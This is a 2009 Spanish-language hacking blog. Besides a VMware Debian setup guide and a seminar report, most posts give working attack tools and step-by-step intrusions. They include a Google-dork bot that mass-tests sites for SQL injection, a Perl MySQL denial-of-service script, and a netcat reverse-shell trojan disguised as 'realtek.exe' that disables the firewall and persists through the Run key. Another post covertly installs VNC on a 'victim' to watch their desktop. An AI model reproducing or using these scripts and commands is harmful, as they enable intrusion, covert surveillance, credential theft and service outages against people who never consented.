6) Pondremos el nombre para nuestra maquina virtual, pongan uno que este relacionado con el SO que esten por intalar (es solo un consejo). En este ejemplo coloque Mi Debian

7)Ahora configuraremos el tamaño de la memoria RAM que le asiganaremos a la VM. Yo tengo 2 gb por lo tanto le di un 556 de ram (je seria mas cuadrado colocar 512?). Tambien tenemos una tablita donde nos dice lo recomendado y una cota maxima de asignacion que le podremos dar.

8) Configuracion del tipo de red. Colocaremos en modo NAT. para que al momento de intalar DEBIAN el programaa de intalacion tome a la red por DHCP sin problemas.

9) En esto dejamos como esta y damos en Sigueinte

10) En esta pantalla marcaremos la primera opcion "Create a new virtual disk". Tenemos las opciones para usar uno disco virtual existente o uno fisico. :)

11) El tipo de disco. Marcamos IDE, ya que cuando intente con SCSI el intalador no encontraba ningun controlador para ese tipo. En fin con IDE me anduvo. :)

12)El tamaño del disco en GB.

13) El nombre del disco virtual. Yo le puse Mi_Debian.vmdk. Y listo ya tenemos..

14) Ahora en la pantalla que sigue, estamos posicionado en el menu de nuestra VM que acabamos de crear. Una opcion que coloco es colocarle el nombre de mi disquetera de CD-ROM, ya que automaticamente no me funcionaba. Hago doble clic en CD-ROM, y luego cambio la opcion que esta en Auto Detect, por el nombre, que en mi caso es el E:.

Ahora solo falta hacer clic en el signo de Play de color verde e iniciara nuestra maquina virtual, tendremos que colocar el CD cd Debian esperar que bootee, y empezar a instalar. La intalacion es como en cualqueir maquina, eso ya es independiente de que si es una VM o una computadora fisica.

Saludos

Bot MySQL Search Google 2.0

2009-10-18T20:13:00.000-07:00

Aunque ya lo había terminado hace un tiempito voy a publicarlo recién por falta de tiempo. Hay algunas mejoras que coloque una de ellas es el filtrado de paginas que son posiblmente inyectables. Es decir que por ejemplo en una busqueda del tipo inurl:*.php?id=, con una cantidad de 10 paginas (o mas o menos es solo un ejemplo), seguramente en la misma búsqueda se van a repetir las mismas paginas por lo cual el BOT en la V. 1.0 no contemplaba esto y redundaba.
Otra característica muy importante es que ahora ya no necesita tanta coparticipación humana, solamente le pasamos los parámetros nesesarios, y empezara la automatizacion que contempla la búsqueda, la obtención de las posibles victimas, y el ataque por SQLi, (osea que podemos dejarlo en la noche y ver los resultados en el otro día) :). En este ataque intentara lo mismo que la versión anterior

1. Sacar columnas mediante la clausula UNION
2. Verificar disponibilidad de Information_schema
3. Verificar disponibilidad de Mysq.Users
4. Verificar si el usuario de la base de datos es r00t. :)

Después por ultimo todo lo recolectado lo guardara en un archivo que nosotros le diremos el nombre para que lo guarde en el misma ru

ta de donde es ejecutado el script, asi lov eremos despues con mayor tranquilidad.

Ejmplo de uso.

+++++++++++++++++++++++++++++++++++++
+ Bot MySQL Search Google 2.0 +
+ By MagnoBalt +
+++++++++++++++++++++++++++++++++++++

[?]Ingrese Patron de Busqueda (ej: inurl:.php?id_noticia=: >> inrul:noticias.php?id= site:com.ar
[?]Total de paginas de busquedas en Google: >> 15
[?]Nombre de archivo donde guardar todo: >>paginas_argentinas.txt

[+]Search:

Fijense los parametros que le paso. En primer lugar esta la busqueda inrul:noticias.php?id= site:com.ar
, en segundo lugar esta la cantidad 15, y como tercer y ultimo esta el archivo de salida donde se almacenara todo paginas_argentinas.txt.

Despues solo resta ver el archivo donde mostrata una lista con las que no pudo y las que pudo inyectar SQL, en donde en esta ultimas mostrara el detalle.

Aca esta el codigo s0urce

Tengo pensado seguir agregandole mas funciones y mas tipos de inyecciones. Ya tengo preparado para que la busqueda sea atravez del BING. Asi que esa seria una mejoria para la proxima. Si alguien tiene alguna idea o algun arreglo o parte de codigo con mucho gusto sera recibido..

Saludos..

Seminario Seguridad Goya Corrientes

2009-10-08T10:03:00.001-07:00

Lugar del evento: Intituto San Martin
Organizacion: Intitudo San Martin e Instel & Seguridad
Bueno este fin de semana que paso, mas presisamente el Sabado 3 de Octubre, fuimos a Goya( mi ciudad natal), con Pedro Matias Cacivio y Sebastian del Prado a realizar la primera charla sobre Seguridad Informatica que se realiza en ese municipio.
Los temas que se tocaron fueron los mismo dados en el ultimo Security Hacking NEA 4. Primero abrio Pedro con su tema "A seguro se lo llevaron Preso", donde mostros las vulnerabilidades WEB principales que nos encontramos en internet como es XSS, LFI, RFI, y un poco de SQLi atravez de un MSSQL. En LFI mostros como a partir de un INCLUDE mal filtrado podemos llegar a llamar archivos del servidor y empezar a escalar privilegios, hasta ingresar al host. Muy Bueno!. Al termino de Pedro se hizo un break donde se ofrecio cafe y bizcochitos.

Despues Segui yo con el tema de SQLi basandonos en un motor de MySQL, donde mostre algunas diferencias con ataques a PostGre y MSSQL. Sobre MySQL mostre atacar mediante la clausula UNION luego llamar a las vista Information_schema, para sacar datos desde ahi y obtener los apreciados usuarios:contraseñas. Se vio tambiende como poder leer archivos mediante LOAD_FILE y como subir un archivo mediante INTO OUTFILE, imaginen el peligro de que el usuario en la WEB tenga permiso de FILE y podamos inyectar, o que es lo mas estupido, cuando nos encontramos con permiso de r00t (que Gran error!!!!!!!!!).

Despues de esto ya se hizo las 1 y monedas y fuimos a comer a un restaurante a la vuelta de donde se realizo el Seminario (Juventud Unida)
al regresar como 3:30 se largo la charla de Forense de Sebastian del Prado, donde se mostro como se actua ante un acto ilicito, como recolectar toda la informacion de ecenario, Pen, Discos, informacion volatil etc. Tambien se vio un poco del tema de celulares, maquinas fotograficas etc. Muy completo e intereante.

A lo ultimo se encargaron de terminar el semminario con la charla de Hacking Wifi por Sebastian y Pedro nuevamente. Donde se sortearon dos remeras del evento del SSHNEA4 apartir del numeros de las entradas y una a la mejor respuesta de como haria ud para segurizar si red WIFI?.
En fin mas que nada agradecer a los profesores Juan Jose Lezcano (mi tio), Prof. Morales y la Rectora Lila de Giuliani por la buena onda y prganizacion. Esperamos ir nuevamente hacia alla y hacer algunos talleres que quedaron pendientes con el publico participante y mas que nada que es bueno ir de donde se vino :)..

Saludos a todos

Reverse VNC

2009-09-27T15:53:00.000-07:00

Bueno hace un rato estube jugando con el VNC, probando conexiones inversas. Esto puede ser muy util cuando por ejemplo no podemos abrir algun puerto en algun router ordinario, o por ejemplo cuando estemos atras de un router con alguna victima y quiseramos ver el escritorio de la misma. Entonces podemos hacer una conexion inversa hacia nosotros.
Bueno si se leyeron este post http://magnobalt.blogspot.com/2009/09/reverse-shell-netcat-with-batch.html donde explico que es una conexion inversa y que ademas este script es por ejemplo el que pude usar para tener acceso a una maquina victima o probar en localhost (que es lo que se debe hacer :) ) para agarrar practica y despues tirarse a volar.
Entonces veamos, imaginemos que tenemos acceso a una pc con windows mediante el script que hice en el post del enlace mas arriba. Nosotros ahora queremos ver mas, osea queremos ver que esta haciendo, con quien chatea, osea ver su Escritorio :) . Bueno entonces, que nesesitamos.

Servidor TFTP descargar aqui
TightVNC descargar aqui

Configurando VNC
Descarguen el VNC intalenlo en su maquina, y ejecutenlo.
Vamos a configurarlo primero coloquenle un password a el VNC en esa imagen muestra donde se coloca.

Ahora vamos a colocar que el icono no se muestre en la barra de tarea, para eso hacemos esto. Vamos al regitro de Windows y nos dirigimos a

HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3,
agregaremos un nuevo valor Dword, con el nombre de DisableTrayIcon, y le daremos un valor de 1, como queda en esta imagen.

Lo que sigue es exportar la configuracion de nuestro VNC a un archivo .reg para que cuando le intalemos en la victima no tire ningun Warning de que falta setear algun password, y que el icono no se muestre etc.
entonces nos vamos a estas direeciones para exportar
HKEY_CURRENT_USER\Software\ORL\WinVNC3, Clic derecho luego en Exportar, y guardaremos con el nombre de regvnc1, ahora expotaremos el siguiente conjunto el cual es HKEY_LOCAL_MACHINE\SOFTWARE\ORL, y guardaremos con el nombre de regvnc2.
Pasamos al otro paso :)

Configurando carpeta de Bajadas de TFTP
Una vez descargado el TFTP creen una carpeta por ejemplo en el C:\Bajadas y copienlo ahi, lo mismo hagan con el ejecutable del TightVNC, y los archivos .reg que habiamos creado anteriormente (regvnc1.reg y regvnc2.reg)
Ejecuten el Servidor TFTP, una vez ejecutado seguro les pedira si tienen intalado el Firewall un alerta, coloquenlo como exepcion.

Entonces C:\Bajadas tiene estos archivos

tftp
TightVNC
regvnc1.reg
regvnc2.reg

Dijimos que por algun Motivo X estamos en una consola de una victima ya sea mediante algun Exploit o con el post que hice sobre troyanizando Netcat.

Descargando y Ejecutando
Estos son los pasos como debemos descargarnos las cosas desde nustra pc a la victima y como se ejecuta paso por paso.

a. En la consola de nuestra victima colocamos.
PC Victim
c:\tftp -i nuestraip get regvnc1.reg
c:\tftp -i nuestraip get regvnc2.reg
c:\tftp -i nuestraip get tightvnc-1.3.9-setup.exe (en mi caso es ejecutable del VNC se llama asi)

Bien ahora tenemos descargados nuestras archivos para empezar. Ahora intalemos y configuremos

c:\tightvnc-1.3.9-setup.exe /sp- /verysilent
c:\regedit /s regvnc1.reg
c:\regedit /s regvnc2.reg
c:\rd /s /q "%allusersprofile%\menú inicio\programas\tightvnc"

En la primera opcion lo que hacemos es intalar el TightVNC silenciosamente, que lindo no?
Y en las otras dos lineas hacemos lo mismo importamos nuestros archivos .reg silenciosamente. :)
Y en la cuarta linea lo que hacemos es borrar del menu inicio el panel del tightVNC para que no se tan bandera. je..

Bien ya esta casi todo preparado ahora probemos si funciona. Nos quedan estos dos pasitos.
Abrimos una consola (cmd.exe) en nuestra maquina y nos vamos a

D:\>cd "Archivos de programa"

D:\Archivos de programa>cd TightVNC

Y ejecutamos:

D:\Archivos de programa\TightVNC>vncviewer.exe -listen

Lo que hacmoes aca es dejar un demonio del VNC en modo listen para posibles conexion hacia nosotros.

Y ahora nos vamos a la consola de la victima y nos dirijimos a la misma carpeta que nos situamos en la nuestra osea Archivos de programa\TightVNC, y ejecutamos:

C:\Archivos de programa\TightVNC>WinVNC.exe -run
Damos ejecucion al servidor VNC en la maquina victima :). Podemos ver si todo va bien con el comando tasklist, y ver si hay un WinVNC.exe corriendo..

Al fin viene lo divertido :). Ejecutemos la conexion Reversa
C:\Archivos de programa\TightVNC>WinVNC.exe -connect nuestraip

Ahora si todo sale bien y esperamos unos segundos nos aparecera el escritorio de la victima mediante el VNC, donde podemos hacer lo que se nos plazca desde subirle archivos, descargar los suyos, manejar su mouse.. Etc, etc, etc.....

Si se habran dado cuenta tambien con esta forma podemos conectarnos a la maquina de la victima directamente con el cliente del VNC, ya que esta todo configurado para ingresar y el password sera el el que colocamos cuando empezamos la configuracion.
Obviamente que cada vez que reinicie la maquina la victima tendriamos que ejcutar el WinVNC.exe para que este todo ok!! Eso es todo

Saludos

Bot MySQL Search Google 1.0 && 2.0

2009-09-20T19:10:00.000-07:00

Bueno hace un mes anduve codeando una tools que lo que haga es automatizar algunas de las tantas cosas que uno hace cuando busca un SQLi.
Asi que tengo dos versiones de esta tools la 1.0 y la 2.0. Bien digamos que la diferencia que hay entre las dos es que la 1.0 nesesita algo de participacion humana, pero le voy a comentar mejor como se usa, las diferencias y de que se trata.

1.0) En esta version lo que hace es primero que nada te pide dos variables:
Parametro 1)patron de busqueda para google, lo que vamos a usar son las API que nos ofrece google para hacer busquedas mas avanzadas de las normales (Recomiendo http://johnny.ihackstuff.com/ghdb/). Por ejemplo un patron que utilizamos muchos seria este: inurl:*..php?id=, que es lo que hacemos con esta busqueda? Pues decimos a google que nos encuentre todas las direeciones que tengan en la URL algo con noticia.php?id=4545, mirar.php?id=454, sadasda.php?id=1 ....... En todo lo que sigan ese patron. Pues con esas paginas despues el BOT lo que va hacer es testear si algunas de esas es posivlemente vulnerable. Tambien pudieramos filtrar un poco la busqueda, es decir por ejemplo buscar solo paginas con la terminacion com.ar. De esta forma: inurl:*.php?id= site:com.ar

Parametro 2) Numero de cantidad de paginas de Google. que puede ser unas 10, 20, 30 60 etc.. Hay que acordarse que cuando el BOT de google sospecha de algun comportamiento sospechoso pedira un captcha, y en este caso el BOT no podra seguir consiguiendo enlaces.. Despues se vera como Bypasser eso :)..Si alguien tiene alguna Idea...
Entonces la pantalla principal seria algo asi con sus dos parametros

+++++++++++++++++++++++++++++++
+ Bot MySQL Search Google +
+ By MagnoBalt +
+++++++++++++++++++++++++++++++

[?]Ingrese Parametro de Busqueda (ej: inurl:.php?id_noticia=: >> inurl:*.php?id=
site:com.ar
[?]Total de paginas de busquedas en Google: >> 10

[+]Search:

Y en este moemnto empieza la busqueda.. Solo habra que esperar hasta que arroje los resultados.. Tendriamos algo parecido a esto

[0]http://pagina0.com.ar/ficha.php?id=291
[1]http://www.pagina1.com.ar/acti_nota.php?id=912
[2]http://www.pagina2.com.ar/nota_completa.php?id=1536
[3]http://www.pagina3.com.ar/acti_nota.php?id=894
[4]http://www.pagina2.com.ar/edimpresa/nota.php?id=207214
[5]http://www.pagina4.com.ar/nota_completa.php?id=3917
[6]http://www.pagina5.com.ar/articulo.php?recurso=601
[7]http://pagina5.com.ar/seccion.php?id=76
[8]http://www.pagina7.com.ar/viewtopic.php?id=23

[?]A cual desea automatizar la inyeccion. Eliga por el indice:>>

Una vez tenido la lista podemos empezar la automatizacion seleccionando por el indice la que queremos testear. Por ejemplo si quisieramos probar con www.pagina2.com.ar (No colocare la pagina verdadera solo nombres fictisios) colocariamos su indice que en este caso es 2
Note que hay paginas que estan repetidas, pues una de esas es la mejora del BOT 2.0, coloque una funcion para filtrar las que ya tenia como posibles vulnerables.

Ahora al colocar en este caso 2 nos pedira 2 parametros que nesesitamos para que empieze el testeo. quedaria algo asi:

[?]A cual desea automatizar la inyeccion. Eliga por el indice:>>2
[+]Empezando la automatizacion del la inyeccion.
[!]Primer Paso: Intentar sacar numero de columnas para UNION
[?]Maximo numero con cual intentar:>>20
[?]elija comentario -- or /* :>>--

Osea lo que hice es pasarle un numero 20, que es una cota maximo de intentos para buscar las culumnas que nesesita la clausula UNION, y el segundo fue que comentario utilizar que en este caso coloque --
Entonces tenemos algo como esto

[+]Search:
[+]La web posee 10
[+]http://pagina2.com.ar/ficha.php?id=-1+UNION+SELECT+0,1,2,3,4,5,6
,7,8,9--

[!]Segundo Paso: Verficando disponibilidad de Information_Schema
[+]Information Schema Disponible
[!]Tercer Paso: Verificando disponibilidad de de Mysql.users
[-]Mysql.users no Disponible
[!]Cuarto Paso: Verificando si el usuario es root
[-]El usuario no es root
[?]Desea Seguir con otro enlace Y/N: >>

Los pasos son encontrar la cantidad de columnas despues verificar si esta disponicle Information_Schema blablablabla.. bueno ahi se ve todo lo que hace no?? Nos pregunta si queremos seguir si colocamos Y podremos seguir inyectando otra y a la que ya hayamos inyectado nos colocara al final del link un *, osea que va hacer tantos * al lado de un enlace como tantas veces hayamos testeado el enlace. Ejemplo si llegasemos a no encontrar columnas a una con una cota superior por ejemplo podriamos intentar con una cota mas grande en este caso al listar por segunda vez despues de haber intentado la anterior en el enlace quedaria

[2]http://www.pagina2.com.ar/nota_completa.php?id=1536 *

Bueno en La proxima colocare la version 2.0

Aca esta el codigo http://paste2.org/p/433646

Saludos

The Blind Fox

2009-09-10T09:40:00.000-07:00

Blind Fox, es una herramienta codificada en perl por Loggin-root, el cual nos permite automatizar la inyecciones de BLIND SQL . Este script se fijara si el motor que estamos atacando tiene permiso a las vista information_schema y a la tabla Mysql.users. Luego hace un bruteo de las posibles tablas que los programadores usan al crear una para los usuarios y las posibles columnas que tendra esa tabla, luego de encontrarlas podemos extraer los datos de ella.

Tenemos dos version la V5.0 y la ultima V7.0. Voy a comentar el uso de ambas. Una vez que tengamos el script (abajo estan los links de los script), abrimos un shell, (si estas en Linux ya lo tenes instalado al interprete de perl :) , en Windows vas a tener que descargarte uno e instalarlo :p). y ejecutamos el script ej: perl Blindfox.pl

USO:Version 5.0

perl BlindFox_v05.pl [WEBSITE] [PATRON] [FILE] [-EXT]

[WEBSITE]: http://www.web.com/index.php?id=4875

Esta es la pagina que nosotros encontramos como vulnerable a BLIND SQL, hay que pasarle la direccion con un valor valido. A que me refiero con valido, a que el numero que tiene asignado en este ejemplo la variable “id”, exista en la WEB.

[PATRON]: Bien este es el patron que se encuentra en la pagina TRUE, es decir al inyectar 1=1, la condicion se cumple siempre por lo cual nos mostrara la misma pagina que estaba anteriormente. Entonces hay que elegir alguna palabra de esa pagina “TRUE”, y pasarle al script en ese argumento entre comillas. Por ejemplo “Documento”

[FILE]: Archivo de salida donde guardara el informe para que lo veamos mas tranquilamente luego.

[-EXT]: Este parametro es opcional, si no le pasamos solo chequeara si la pagina es vulnerable, y luego verificara si el usuario de MySQL al que estamos atacando tiene permiso para leer la Vista Schema y la tabla Mysql.Users mas el bruteo de tablas y columnas. Si lo colocamos vamos a poder extraer los valores de alguna tabla y columna especifica

USO: Version 7.0

Uso: perl blindFox.pl [WEBSITE] [FILE] [-EXT]

[WEBSITE]: http://www.web.com/index.php?id=4875
[FILE]: Archivo donde guardar informe
[-EXT]: Para extraer nombres de usuarios, passwords, etc (Opcional)

Como podran observar en esta version no se pasa el PATRON, lo que el autor le agrego una funcion automatica para verificar si es vulnerable o no. ¿Como?. Agrega una funcion que lo que hace es contar las lineas de codigo de la pagina TRUE y la de la FALSE, luego compara dichos valores y si son distintos VULNERABLE!!, si no puede ser que no lo sea.. Pero por que coloco que puede ser.. Hay veces que este SCRIPT no interpreta bien en algunos casos, pero nosotros estamos seguro que la pagina es vulnerable por que inyectamos el AND 1=1 y AND 1=0 y nos da paginas diferentes. Entonces el BlindFox 5.0 nos salva en esta oportunidad pasandole el PATRON que nosotros sabemos que en la TRUE se encuentra y no en la FALSE

Aqui estan los Codigo

Version 5.0 y Version 7.0

Aclaracion: Estas herramientas se utilzan sabiendo lo que se esta haciendo, por eso recomiendo antes leer algun documento soble BLIND SQL.

Saludos

DoS por SQLi

2009-09-07T11:48:00.000-07:00

Resulta que apartir de una inyeccion en SQL , se pueden hacer tantas cosas que es algo que en el area de hacking siempre estan saliendo nuevas tecnicas y nuevas tools. Hoy decidi hacer un POST un poco avanzado para aquellos que no tengan idea de SQLi. Lo que vamos hacer es hacer un DoS al motor de SQL que en este caso el script que escribi para que realize la accion es para atacar un MYSQL.
Lo que hacemos es atacar de forma parecida al que se realiza en Time-Based Blind SQL. Pero en este caso forzamos al motor a realizar un delay constantemente.
Aqui esta el script hecho en perl

· #!/usr/bin/perl
· use IO::Socket;
· if (!@ARGV[2]){
· print "======================================================= \n";
· print " Denial of Service MySQL injection V 1.0by MagnoBalt \n\n";
· print " use perl $0 www.pagina.com.ar /noticia.php?id=45\n\n";
· print "======================================================= \n";
· exit(0);
· }
·
· $host=$ARGV[0];
· $path=$ARGV[1];
· #$injeccion="+and+(select+count(*)+from+information_schema.columns, +information_schema.columns+T1,

+information_schema.tables+T2)" ;

· $injeccion="+and benchmark(99999999999999,md5(0x6b616f78))";
· for($i = 1; $i < $ARGV[2] ; $i++) {
· $pid = fork();
· $socket = new IO::Socket::INET(
· PeerAddr => $host,
· PeerPort => 'http(80)',
· Proto => 'tcp') || die "[-] No se ha podido conectar a $host";
· print $socket "GET " .$path.$injeccion. " HTTP/1.0\r\n";
· print $socket "HOST:$host\r\n";
· print $socket "\n\n";
· print "*";
· }

nota: La linea 13 esta comentada, si quieren provocar el delay con la tecnica "Blind Heavy Query" descomentenla y comenten la linea 14 que es usando la funcion Benchmark.

Dejo el link de otro mismo script pero hecho en php por OzX . Link

Saludos.

Reverse shell netcat with batch

2009-09-03T12:05:00.000-07:00

Buenas, Me decidi crear un Blog ahora que estoy por mis pagos (Goya Corrientes), y no tenia nada que hacer :)..
Bueno en el ultimo Security Hacking NEA 4, se hablo de Reverse Shell por Dardo Valdez (Yaco), donde mostro como hacer uno con la herraminta Crypcat, aqui les dejo un tutorial muy bueno de WHK. Esta herramienta es una evolucion del Netcat y es exactamente igual los comandos con la diferencia de que la informacion viaja Encriptada. Pero bueno este tutorial que esta hecho por mi trabajo con Netcat.
¿Y en realidad que es Netcat? Netcat es una herramienta muy completa que es indispensable para cualquier administrador de red, el cual nos permite realizar conexiones TCP y UPD. Es tantas las cosas que podemos hacer con ella, que se tambien la denominan "La Navaja Suiza de los Hackers".
Bueno, entonces nosotros vamos a utilizar la opcion de Netcat que nos permita abrir un conexion reversa de la victima con nosotros.
¿Y que es en realidad una Conexion reversa? pss... Bueno eso explicare ahora mas adelante cuando empecemos a realizar el Script.. :)..
Basta y empecemos.

1)

Lo que nesesitamos es:

Netcat (obviamente.. Busquenlo en San Google para descargarlo)
QBFC Descarga desde aca

Vamos a trabajar con el QBFC, por algunos motivos, primero los script hechos en batch lo va a pasar a “.exe”, y segundo la mas importate es que nos permite juntar todo nuestros script y darle comandos para que los vaya manejando como queramos. Aqui hay un tuto de el. Aconsejo que lo lean por que voy a obviar su funcionamiento. Y esta muy interesante este programilla.

Ahora empezemos, renombramos el Netcat y le pondremos Win32.exe, abrimos el QBFC y copiamos el siguiente script en el, Ahora antes de guardarlo nos vamos al Icono Options de QBFC luego en la pestaña General marcamos Ghost Aplicattion, que servira para que no muestre ni un solo pestañeo de nada y no haya desconfianza. (Nuevamente recomiendo ver el tutorial de QBFC el cual muestra con imagenes de como utilizarlo.) , ahora lo guardamos con el nombre de “realtek.exe”, para ello nos dirijimos al icono donde dice BUILD.

Netcat > Win32.exe

Scritp_De_abajo > realtek.exe

@echo off

:recursivo

win32.exe -e cmd.exe Tuip 4444

goto recursivo

Bueno entonces que es una Conexion Reversa, pues fijense esta linea "win32.exe -e cmd.exe Tuip 4444", Nosotros que hacemos aca. Primero colocamos el nombre de win32.exe (que es el netcat renombrado por nosotros, para camuflarlo un poco), Ahora aca es la cuestion, le pasamos el comando -e que significa ejecutar, entonces vamos a ejecutar el cmd.exe (la consola de windows) abriendo un tunel hacia nuestra ip en un puerto determinado, que en este caso de ejemplo es el 4444. Este puerto estara escuchando en nuestra maquina a esperca de posibles conexion, cuando la victima ejecute este script pedira conexion hacia nosotros, y como nuestra maquina estara escuchando en ese puerto tendremos el cmd.exe de la victima. Entonces la conexion reversa es que la victima (en este caso) , se conecta a nosotros y no nosotros a ella. ¿Ahora y para que sirve esto.? Y bueno imaginemos que hariamos una conexion directa es decir nosotros pedimos conectarnos a la victima. Empiezan los problemas, ¿cuales? primero que nada tendriamo que concoer su IP. y en el caso de saber que pasaria si tiene ip dinamica.. :(. Ahora tambien podemos pasar por alto algunos firewall no tan complejos, ya que muchos solo no restringen conexiones salientes.

Copiamos el siguiente script, “det.exe”

script_siguiente >det.exe

@echo off

net stop “Centro de Seguridad”

net stop “Firewall de Windows/Conexión compartida a Internet (ICS)”

reg add hklmsoftwaremicrosoftwindowscurrentversionrun /v realtek /t reg_sz /d %systemroot%realtek.exe /f

exit

Este detendra el firewal de windows para que no tengamos problemas, y agregara el proceso realtek.exe al arrancar windows, para que tengamos acceso cada vez que prenda la maquina.

No quise hacerlo mas complejo a la detencion del firewall para hacerlo mas simple. Podran agregarle otras caracteristicas mas eficientes con el comando netsh, recomiendo leer.

Y por ultimo el que manejará la secuencia de las acciones a realizarce. “NCT.exe”( pueden cambiarle el nombre).

@echo off

copy %MYFILES%win32.exe %systemroot%system32

copy %MYFILES%det.exe %systemroot%

copy %MYFILES%realtek.exe %systemroot%

rem borro lo que no utilizaremos mas

del %MYFILES%win32.exe

del %MYFILES%det.exe

del %MYFILES%realtek.exe

rem ejecuto

start %systemroot%det.exe

start %systemroot%realtek.exe

del %systemroot%det.exe

exit

En este ultimo tienen que insertar los distintos archivos que creamos y el netcat osea el “Win32″ , con la pestaña include del QBFC. Por ultimo lo mandamos a nuestra victima. Colocamos en nuestra shell el comando nc -vv -l -p 4444, para escuchar el puerto 4444 y estamos dentro.. Obiamente tener el netcat intalado en su maquina. Recomiendo copiar el ejecutable del netcat en System32, para que este en una ruta PATH

Y con este terminamos. Cualquier duda las pueden colocar y las respondere con mucho gusto..

Saludos..

MagnoBalt